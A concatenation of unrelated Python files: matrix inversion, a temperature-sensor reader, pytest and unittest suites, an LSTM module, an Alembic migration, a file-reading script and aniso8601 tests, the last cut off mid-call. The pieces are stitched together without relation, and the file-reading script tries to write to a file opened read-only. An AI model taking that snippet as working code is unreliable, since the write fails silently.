if abs(a[i][k]) > abs(a[k][k]):
for j in range(k, 2*n):
a[k][j], a[i][j] = a[i][j], a[k][j] #swapping of rows
break
pivot = a[k][k] #defining the pivot
if pivot == 0: #checking if matrix is invertible
print("This matrix is not invertible.")
return
else:
for j in range(k, 2*n): #index of columns of the pivot row
a[k][j] /= pivot
for i in range(n): #index the subtracted rows
if i == k or a[i][k] == 0: continue
factor = a[i][k]
for j in range(k, 2*n): #index the columns for subtraction
a[i][j] -= factor * a[k][j]
for i in range(len(a)): #displaying the matrix
for j in range(n, len(a[0])):
print("{:.2f}".format(a[i][j]), end = " ") #printing upto 2 places in decimal.
print()
|
import os
class GetSensorTmp():
def __init__(self, sensorID):
self.sensorID = sensorID
self.sensorFile = '/sys/bus/w1/devices/{0}/w1_slave'.format(self.sensorID)
if os.path.isfile(self.sensorFile) == False :
raise IOError('sensor is not found.')
def get(self):
with open(self.sensorFile, 'r') as sensorFile:
sensorData = sensorFile.read()
sensorDataSplit = sensorData.split('=')
tmpStr = sensorDataSplit[-1].replace('\n','')
if tmpStr == '85000':
raise IOError('can not get sensor data.')
tmp = round(float(tmpStr) / 1000, 2)
return '{0:.2f}'.format(tmp)
|
""" Test for ESO GSP metadata """
import geopandas as gpd
import pandas as pd
import pytest
from nowcasting_dataset.data_sources.gsp.eso import (
get_gsp_metadata_from_eso,
get_gsp_shape_from_eso,
)
def test_get_gsp_metadata_from_eso():
"""
Test to get the gsp metadata from eso. This should take ~1 second.
"""
metadata = get_gsp_metadata_from_eso()
assert metadata["gsp_id"].is_unique == 1
assert isinstance(metadata, pd.DataFrame)
assert len(metadata) > 100
assert "gnode_name" in metadata.columns
assert "gnode_lat" in metadata.columns
assert "gnode_lon" in metadata.columns
def test_get_pv_gsp_shape():
"""
Test to get the gsp metadata from eso. This should take ~1 second.
"""
gsp_shapes = get_gsp_shape_from_eso()
assert gsp_shapes["RegionID"].is_unique
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
def test_get_pv_gsp_shape_duplicates():
"""
Test to get the gsp metadata from eso. This should take ~1 second.
Do not remove duplicate region enteries
"""
gsp_shapes = get_gsp_shape_from_eso(join_duplicates=False)
assert gsp_shapes["RegionID"].is_unique is False
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
@pytest.mark.skip("Skip this for the moment as not needed for CI")
def test_get_pv_gsp_shape_from_eso():
"""
Test to get the gsp metadata from eso. This should take ~1 second.
"""
gsp_shapes = get_gsp_shape_from_eso(load_local_file=False)
assert gsp_shapes["RegionID"].is_unique
assert isinstance(gsp_shapes, gpd.GeoDataFrame)
assert "RegionID" in gsp_shapes.columns
assert "RegionName" in gsp_shapes.columns
assert "geometry" in gsp_shapes.columns
|
import sqlparser
from sqlparser import ENodeType
# Translates a node_type ID into a string
def translate_node_type(node_type):
for k,v in ENodeType.__dict__.iteritems():
if v == node_type:
return k
return None
# Print node and traverse recursively
def process_node(node, depth=0, name='root'):
# print attributes like ints and strings
if not isinstance(node, sqlparser.Node):
print "%s%s: '%s'" % (" " * depth, name, str(node))
return
# print node attribute
if node is not None and isinstance(node, sqlparser.Node):
print "%s%s: %s (%d), text: '%s'" % (" " * depth, name, translate_node_type(node.node_type), node.node_type, node.get_text())
# Go through the list (if the current node is a list)
if node.node_type == ENodeType.list:
for i, subnode in enumerate(node.list):
process_node(subnode, depth + 1, 'list_item#%s' % i)
return
# Iterate through all attributes
for k,v in node.__dict__.items():
process_node(v, depth + 1, k)
parser = sqlparser.Parser(vendor=0)
query = "SELECT a, b, c FROM tbl1 WHERE d IN (1,2,3)"
parser.check_syntax(query)
stmt = parser.get_statement(0)
root = stmt.get_root()
process_node(root)
|
import configparser
import os
import unittest
import unittest.mock as mock
from requests import exceptions
from gras.github.github import GithubInterface
from gras.utils import to_iso_format
class TestGithubInterface(unittest.TestCase):
def setUp(self):
parser = configparser.ConfigParser()
parser.read_file(open(os.path.dirname(os.path.abspath(__file__)) + "/data/test_config.ini"))
self.github_token = parser.get("GITHUB", "github_token")
self.name = parser.get("GITHUB", "name")
self.owner = parser.get("GITHUB", "owner")
self.start_date = to_iso_format(parser.get("GITHUB", "start_date"))
self.end_date = to_iso_format(parser.get("GITHUB", "end_date"))
self.url = f"https://api.github.com/search/commits?q=repo:{self.owner}/" \
f"{self.name}+merge:false+committer-date:{self.start_date}.." \
f"{self.end_date}+sort:committer-date-asc&per_page=1&page=1"
@mock.patch('gras.query_engine.github.GithubInterface')
def test_send_request_via_url_if_accept_header(self, mock_request):
mock_request.return_value.status_code = 200
github = GithubInterface(
url=f"https://api.github.com/search/commits?q=repo:{self.owner}/{self.name}+merge:false+"
f"committer-date:{self.start_date}..{self.end_date}+sort:committer-date-asc&per_page=1&page=1",
additional_headers=dict(Accept="application/vnd.github.cloak-preview+json")
)
response = github.iterator()
self.assertTrue(response.status_code)
@mock.patch('gras.query_engine.github.GithubInterface')
def test_send_request_via_url_if_no_accept_header(self, mock_request):
mock_request.return_value.side_effect = f"Problem with getting data via url {self.url}."
github = GithubInterface(
url=self.url
)
try:
github.iterator()
except exceptions.RequestException as e:
self.assertTrue(e)
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import math
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import PackedSequence
import torch.nn.functional as F
class LSTMHardSigmoid(Module):
def __init__(self, input_size, hidden_size,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False):
super(LSTMHardSigmoid, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.dropout_state = {}
self.bidirectional = bidirectional
num_directions = 2 if bidirectional else 1
gate_size = 4 * hidden_size
self._all_weights = []
for layer in range(num_layers):
for direction in range(num_directions):
layer_input_size = input_size if layer == 0 else hidden_size * num_directions
w_ih = Parameter(torch.Tensor(gate_size, layer_input_size))
w_hh = Parameter(torch.Tensor(gate_size, hidden_size))
b_ih = Parameter(torch.Tensor(gate_size))
b_hh = Parameter(torch.Tensor(gate_size))
layer_params = (w_ih, w_hh, b_ih, b_hh)
suffix = '_reverse' if direction == 1 else ''
param_names = ['weight_ih_l{}{}', 'weight_hh_l{}{}']
if bias:
param_names += ['bias_ih_l{}{}', 'bias_hh_l{}{}']
param_names = [x.format(layer, suffix) for x in param_names]
for name, param in zip(param_names, layer_params):
setattr(self, name, param)
self._all_weights.append(param_names)
self.flatten_parameters()
self.reset_parameters()
def flatten_parameters(self):
"""Resets parameter data pointer so that they can use faster code paths.
Right now, this is a no-op wince we don't use CUDA acceleration.
"""
self._data_ptrs = []
def _apply(self, fn):
ret = super(LSTMHardSigmoid, self)._apply(fn)
self.flatten_parameters()
return ret
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
weight.data.uniform_(-stdv, stdv)
def forward(self, input, hx=None):
is_packed = isinstance(input, PackedSequence)
if is_packed:
input, batch_sizes = input
max_batch_size = batch_sizes[0]
else:
batch_sizes = None
max_batch_size = input.size(0) if self.batch_first else input.size(1)
if hx is None:
num_directions = 2 if self.bidirectional else 1
hx = torch.autograd.Variable(input.data.new(self.num_layers *
num_directions,
max_batch_size,
self.hidden_size).zero_(), requires_grad=False)
hx = (hx, hx)
has_flat_weights = list(p.data.data_ptr() for p in self.parameters()) == self._data_ptrs
if has_flat_weights:
first_data = next(self.parameters()).data
assert first_data.storage().size() == self._param_buf_size
flat_weight = first_data.new().set_(first_data.storage(), 0, torch.Size([self._param_buf_size]))
else:
flat_weight = None
func = AutogradRNN(
self.input_size,
self.hidden_size,
num_layers=self.num_layers,
batch_first=self.batch_first,
dropout=self.dropout,
train=self.training,
bidirectional=self.bidirectional,
batch_sizes=batch_sizes,
dropout_state=self.dropout_state,
flat_weight=flat_weight
)
output, hidden = func(input, self.all_weights, hx)
if is_packed:
output = PackedSequence(output, batch_sizes)
return output, hidden
def __repr__(self):
s = '{name}({input_size}, {hidden_size}'
if self.num_layers != 1:
s += ', num_layers={num_layers}'
if self.bias is not True:
s += ', bias={bias}'
if self.batch_first is not False:
s += ', batch_first={batch_first}'
if self.dropout != 0:
s += ', dropout={dropout}'
if self.bidirectional is not False:
s += ', bidirectional={bidirectional}'
s += ')'
return s.format(name=self.__class__.__name__, **self.__dict__)
def __setstate__(self, d):
super(LSTMHardSigmoid, self).__setstate__(d)
self.__dict__.setdefault('_data_ptrs', [])
if 'all_weights' in d:
self._all_weights = d['all_weights']
if isinstance(self._all_weights[0][0], str):
return
num_layers = self.num_layers
num_directions = 2 if self.bidirectional else 1
self._all_weights = []
for layer in range(num_layers):
for direction in range(num_directions):
suffix = '_reverse' if direction == 1 else ''
weights = ['weight_ih_l{}{}', 'weight_hh_l{}{}', 'bias_ih_l{}{}', 'bias_hh_l{}{}']
weights = [x.format(layer, suffix) for x in weights]
if self.bias:
self._all_weights += [weights]
else:
self._all_weights += [weights[:2]]
@property
def all_weights(self):
return [[getattr(self, weight) for weight in weights] for weights in self._all_weights]
def AutogradRNN(input_size, hidden_size, num_layers=1, batch_first=False,
dropout=0, train=True, bidirectional=False, batch_sizes=None,
dropout_state=None, flat_weight=None):
cell = LSTMCell
if batch_sizes is None:
rec_factory = Recurrent
else:
rec_factory = variable_recurrent_factory(batch_sizes)
if bidirectional:
layer = (rec_factory(cell), rec_factory(cell, reverse=True))
else:
layer = (rec_factory(cell),)
func = StackedRNN(layer,
num_layers,
True,
dropout=dropout,
train=train)
def forward(input, weight, hidden):
if batch_first and batch_sizes is None:
input = input.transpose(0, 1)
nexth, output = func(input, hidden, weight)
if batch_first and batch_sizes is None:
output = output.transpose(0, 1)
return output, nexth
return forward
def Recurrent(inner, reverse=False):
def forward(input, hidden, weight):
output = []
steps = range(input.size(0) - 1, -1, -1) if reverse else range(input.size(0))
for i in steps:
hidden = inner(input[i], hidden, *weight)
# hack to handle LSTM
output.append(hidden[0] if isinstance(hidden, tuple) else hidden)
if reverse:
output.reverse()
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
return hidden, output
return forward
def variable_recurrent_factory(batch_sizes):
def fac(inner, reverse=False):
if reverse:
return VariableRecurrentReverse(batch_sizes, inner)
else:
return VariableRecurrent(batch_sizes, inner)
return fac
def VariableRecurrent(batch_sizes, inner):
def forward(input, hidden, weight):
output = []
input_offset = 0
last_batch_size = batch_sizes[0]
hiddens = []
flat_hidden = not isinstance(hidden, tuple)
if flat_hidden:
hidden = (hidden,)
for batch_size in batch_sizes:
step_input = input[input_offset:input_offset + batch_size]
input_offset += batch_size
dec = last_batch_size - batch_size
if dec > 0:
hiddens.append(tuple(h[-dec:] for h in hidden))
hidden = tuple(h[:-dec] for h in hidden)
last_batch_size = batch_size
if flat_hidden:
hidden = (inner(step_input, hidden[0], *weight),)
else:
hidden = inner(step_input, hidden, *weight)
output.append(hidden[0])
hiddens.append(hidden)
hiddens.reverse()
hidden = tuple(torch.cat(h, 0) for h in zip(*hiddens))
assert hidden[0].size(0) == batch_sizes[0]
if flat_hidden:
hidden = hidden[0]
output = torch.cat(output, 0)
return hidden, output
return forward
def VariableRecurrentReverse(batch_sizes, inner):
def forward(input, hidden, weight):
output = []
input_offset = input.size(0)
last_batch_size = batch_sizes[-1]
initial_hidden = hidden
flat_hidden = not isinstance(hidden, tuple)
if flat_hidden:
hidden = (hidden,)
initial_hidden = (initial_hidden,)
hidden = tuple(h[:batch_sizes[-1]] for h in hidden)
for batch_size in reversed(batch_sizes):
inc = batch_size - last_batch_size
if inc > 0:
hidden = tuple(torch.cat((h, ih[last_batch_size:batch_size]), 0)
for h, ih in zip(hidden, initial_hidden))
last_batch_size = batch_size
step_input = input[input_offset - batch_size:input_offset]
input_offset -= batch_size
if flat_hidden:
hidden = (inner(step_input, hidden[0], *weight),)
else:
hidden = inner(step_input, hidden, *weight)
output.append(hidden[0])
output.reverse()
output = torch.cat(output, 0)
if flat_hidden:
hidden = hidden[0]
return hidden, output
return forward
def StackedRNN(inners, num_layers, lstm=False, dropout=0, train=True):
num_directions = len(inners)
total_layers = num_layers * num_directions
def forward(input, hidden, weight):
assert(len(weight) == total_layers)
next_hidden = []
if lstm:
hidden = list(zip(*hidden))
for i in range(num_layers):
all_output = []
for j, inner in enumerate(inners):
l = i * num_directions + j
hy, output = inner(input, hidden[l], weight[l])
next_hidden.append(hy)
all_output.append(output)
input = torch.cat(all_output, input.dim() - 1)
if dropout != 0 and i < num_layers - 1:
input = F.dropout(input, p=dropout, training=train, inplace=False)
if lstm:
next_h, next_c = zip(*next_hidden)
next_hidden = (
torch.cat(next_h, 0).view(total_layers, *next_h[0].size()),
torch.cat(next_c, 0).view(total_layers, *next_c[0].size())
)
else:
next_hidden = torch.cat(next_hidden, 0).view(
total_layers, *next_hidden[0].size())
return next_hidden, input
return forward
def LSTMCell(input, hidden, w_ih, w_hh, b_ih=None, b_hh=None):
"""
LSTMCell is a modified LSTM cell with hard sigmoid activation on the input.
"""
hx, cx = hidden
gates = F.linear(input, w_ih, b_ih) + F.linear(hx, w_hh, b_hh)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = hard_sigmoid(ingate)
forgetgate = hard_sigmoid(forgetgate)
cellgate = F.tanh(cellgate)
outgate = hard_sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy)
return hy, cy
def hard_sigmoid(x):
"""
hard_sigmoid computes element-wise hard sigmoid of x.
"""
x = (0.2 * x) + 0.5
x = F.threshold(-x, -1, -1)
x = F.threshold(-x, 0, 0)
return x
|
"""properly named delivery_location_uuid and delivery_location on Task
Revision ID: 4d2f69dc0c76
Revises: 94bf8e9e0043
Create Date: 2021-01-31 15:06:43.998809
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '4d2f69dc0c76'
down_revision = '94bf8e9e0043'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('location_type',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('label', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.drop_constraint('address_uuid_key', 'address', type_='unique')
op.drop_column('address', 'uuid')
op.add_column('location', sa.Column('location_type_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'location', 'location_type', ['location_type_id'], ['id'])
op.add_column('task', sa.Column('delivery_location_uuid', postgresql.UUID(as_uuid=True), nullable=True))
op.add_column('task', sa.Column('pickup_location_uuid', postgresql.UUID(as_uuid=True), nullable=True))
op.drop_constraint('task_saved_location_dropoff_uuid_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_pickup_address_id_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_saved_location_pickup_uuid_fkey', 'task', type_='foreignkey')
op.drop_constraint('task_dropoff_address_id_fkey', 'task', type_='foreignkey')
op.create_foreign_key(None, 'task', 'location', ['pickup_location_uuid'], ['uuid'])
op.create_foreign_key(None, 'task', 'location', ['delivery_location_uuid'], ['uuid'])
op.drop_column('task', 'pickup_address_id')
op.drop_column('task', 'dropoff_address_id')
op.drop_column('task', 'saved_location_pickup_uuid')
op.drop_column('task', 'saved_location_dropoff_uuid')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('task', sa.Column('saved_location_dropoff_uuid', postgresql.UUID(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('saved_location_pickup_uuid', postgresql.UUID(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('dropoff_address_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.add_column('task', sa.Column('pickup_address_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'task', type_='foreignkey')
op.drop_constraint(None, 'task', type_='foreignkey')
op.create_foreign_key('task_dropoff_address_id_fkey', 'task', 'address', ['dropoff_address_id'], ['id'])
op.create_foreign_key('task_saved_location_pickup_uuid_fkey', 'task', 'location', ['saved_location_pickup_uuid'], ['uuid'])
op.create_foreign_key('task_pickup_address_id_fkey', 'task', 'address', ['pickup_address_id'], ['id'])
op.create_foreign_key('task_saved_location_dropoff_uuid_fkey', 'task', 'location', ['saved_location_dropoff_uuid'], ['uuid'])
op.drop_column('task', 'pickup_location_uuid')
op.drop_column('task', 'delivery_location_uuid')
op.drop_constraint(None, 'location', type_='foreignkey')
op.drop_column('location', 'location_type_id')
op.add_column('address', sa.Column('uuid', postgresql.UUID(), autoincrement=False, nullable=False))
op.create_unique_constraint('address_uuid_key', 'address', ['uuid'])
op.drop_table('location_type')
# ### end Alembic commands ###
|
lineMessage = "Printing Entire File"
print(lineMessage)
print("-" * len(lineMessage))
with open('test.txt') as file_object:
#contents = file_object.readlines()
contents = file_object.read()
print(contents)
print("\n")
lineMessage = "Printing Entire File Line by Line"
print(lineMessage)
print("-" * len(lineMessage))
with open('test.txt') as file_object:
line_num = 1
for line in file_object:
print("{} {}".format(line_num,line.rstrip()))
line_num += 1
# Write to file
try:
with open('drive-spces.txt', 'r') as file_object:
file_object.write("This is output from df command\n")
except:
print("File Issues")
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import datetime
import unittest
from aniso8601 import compat
from aniso8601.exceptions import (DayOutOfBoundsError, HoursOutOfBoundsError,
ISOFormatError, LeapSecondError,
MidnightBoundsError, MinutesOutOfBoundsError,
SecondsOutOfBoundsError,
WeekOutOfBoundsError, YearOutOfBoundsError)
from aniso8601.builders.python import PythonTimeBuilder
from aniso8601.utcoffset import UTCOffset
class TestPythonTimeBuilder(unittest.TestCase):
def test_build_date(self):
testtuples = (({'YYYY': '2013', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(2013, 1, 1)),
({'YYYY': '0001', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1, 1, 1)),
({'YYYY': '1900', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1900, 1, 1)),
({'YYYY': '1981', 'MM': '04', 'DD': '05', 'Www': None,
'D': None, 'DDD': None},
datetime.date(1981, 4, 5)),
({'YYYY': '1981', 'MM': '04', 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1981, 4, 1)),
({'YYYY': '1981', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '095'},
datetime.date(1981, 4, 5)),
({'YYYY': '1981', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '365'},
datetime.date(1981, 12, 31)),
({'YYYY': '1980', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': '366'},
datetime.date(1980, 12, 31)),
#Make sure we shift in zeros
({'YYYY': '1', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1000, 1, 1)),
({'YYYY': '12', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1200, 1, 1)),
({'YYYY': '123', 'MM': None, 'DD': None, 'Www': None,
'D': None, 'DDD': None},
datetime.date(1230, 1, 1)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_date(**testtuple[0])
self.assertEqual(result, testtuple[1])
#Test weekday
testtuples = (({'YYYY': '2004', 'MM': None, 'DD': None, 'Www': '53',
'D': None, 'DDD': None},
datetime.date(2004, 12, 27), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '01',
'D': None, 'DDD': None},
datetime.date(2008, 12, 29), 0),
({'YYYY': '2010', 'MM': None, 'DD': None, 'Www': '01',
'D': None, 'DDD': None},
datetime.date(2010, 1, 4), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '53',
'D': None, 'DDD': None},
datetime.date(2009, 12, 28), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '01',
'D': '1', 'DDD': None},
datetime.date(2008, 12, 29), 0),
({'YYYY': '2009', 'MM': None, 'DD': None, 'Www': '53',
'D': '7', 'DDD': None},
datetime.date(2010, 1, 3), 6),
({'YYYY': '2010', 'MM': None, 'DD': None, 'Www': '01',
'D': '1', 'DDD': None},
datetime.date(2010, 1, 4), 0),
({'YYYY': '2004', 'MM': None, 'DD': None, 'Www': '53',
'D': '6', 'DDD': None},
datetime.date(2005, 1, 1), 5))
for testtuple in testtuples:
result = PythonTimeBuilder.build_date(**testtuple[0])
self.assertEqual(result, testtuple[1])
self.assertEqual(result.weekday(), testtuple[2])
def test_build_date_bounds_checking(self):
#0 isn't a valid week number
with self.assertRaises(WeekOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2003', Www='00')
#Week must not be larger than 53
with self.assertRaises(WeekOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2004', Www='54')
#0 isn't a valid day number
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2001', Www='02', D='0')
#Day must not be larger than 7
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='2001', Www='02', D='8')
#0 isn't a valid year for a Python builder
with self.assertRaises(YearOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='0000')
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='000')
#Day 366 is only valid on a leap year
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='366')
#Day must me 365, or 366, not larger
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder.build_date(YYYY='1981', DDD='367')
def test_build_time(self):
testtuples = (({}, datetime.time()),
({'hh': '12.5'},
datetime.time(hour=12, minute=30)),
({'hh': '23.99999999997'},
datetime.time(hour=23, minute=59, second=59,
microsecond=999999)),
({'hh': '1', 'mm': '23'},
datetime.time(hour=1, minute=23)),
({'hh': '1', 'mm': '23.4567'},
datetime.time(hour=1, minute=23, second=27,
microsecond=402000)),
({'hh': '14', 'mm': '43.999999997'},
datetime.time(hour=14, minute=43, second=59,
microsecond=999999)),
({'hh': '1', 'mm': '23', 'ss': '45'},
datetime.time(hour=1, minute=23, second=45)),
({'hh': '23', 'mm': '21', 'ss': '28.512400'},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400)),
({'hh': '01', 'mm': '03', 'ss': '11.858714'},
datetime.time(hour=1, minute=3, second=11,
microsecond=858714)),
({'hh': '14', 'mm': '43', 'ss': '59.9999997'},
datetime.time(hour=14, minute=43, second=59,
microsecond=999999)),
({'hh': '24'}, datetime.time(hour=0)),
({'hh': '24', 'mm': '00'}, datetime.time(hour=0)),
({'hh': '24', 'mm': '00', 'ss': '00'},
datetime.time(hour=0)),
({'tz': (False, None, '00', '00', 'UTC', 'timezone')},
datetime.time(tzinfo=UTCOffset(name='UTC', minutes=0))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '00', '00', '+00:00', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+00:00',
minutes=0))),
({'hh': '1', 'mm': '23',
'tz': (False, None, '01', '00', '+1', 'timezone')},
datetime.time(hour=1, minute=23,
tzinfo=UTCOffset(name='+1',
minutes=60))),
({'hh': '1', 'mm': '23.4567',
'tz': (True, None, '01', '00', '-1', 'timezone')},
datetime.time(hour=1, minute=23, second=27,
microsecond=402000,
tzinfo=UTCOffset(name='-1',
minutes=-60))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '01', '30', '+1:30', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+1:30',
minutes=90))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '11', '15', '+11:15', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+11:15',
minutes=675))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '12', '34', '+12:34', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+12:34',
minutes=754))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '00', '00', 'UTC', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'hh': '14.9999999999999999'},
datetime.time(hour=14, minute=59, second=59,
microsecond=999999)),
({'mm': '0.00000000999'},
datetime.time()),
({'mm': '0.0000000999'},
datetime.time(microsecond=5)),
({'ss': '0.0000001'},
datetime.time()),
({'ss': '2.0000048'},
datetime.time(second=2,
microsecond=4)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_time(**testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_time_bounds_checking(self):
#Leap seconds not supported
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/13/parsing-of-leap-second-gives-wildly
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_time(hh='23', mm='59', ss='60')
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_time(hh='23', mm='59', ss='60',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='60')
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='60',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='61')
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='61',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='61')
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='61',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='60')
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='60.1')
with self.assertRaises(HoursOutOfBoundsError):
PythonTimeBuilder.build_time(hh='25')
#Hour 24 can only represent midnight
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='00', ss='01')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='00.1')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='01')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24.1')
def test_build_datetime(self):
testtuples = (((('2019', '06', '05', None, None, None, 'date'),
('01', '03', '11.858714', None, 'time')),
datetime.datetime(2019, 6, 5, hour=1, minute=3,
second=11, microsecond=858714)),
((('1234', '02', '03', None, None, None, 'date'),
('23', '21', '28.512400', None, 'time')),
datetime.datetime(1234, 2, 3, hour=23, minute=21,
second=28, microsecond=512400)),
((('1981', '04', '05', None, None, None, 'date'),
('23', '21', '28.512400',
(False, None, '11', '15', '+11:15', 'timezone'),
'time')),
datetime.datetime(1981, 4, 5, hour=23, minute=21,
second=28, microsecond=512400,
tzinfo=UTCOffset(name='+11:15',
minutes=675))))
for testtuple in testtuples:
result = PythonTimeBuilder.build_datetime(*testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_datetime_bounds_checking(self):
#Leap seconds not supported
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/13/parsing-of-leap-second-gives-wildly
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_datetime(('2016', '12', '31',
None, None, None, 'date'),
('23', '59', '60', None, 'time'))
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_datetime(('2016', '12', '31',
None, None, None, 'date'),
('23', '59', '60',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '60', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '60',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '61', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '61',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '59', '61', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '59', '61',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
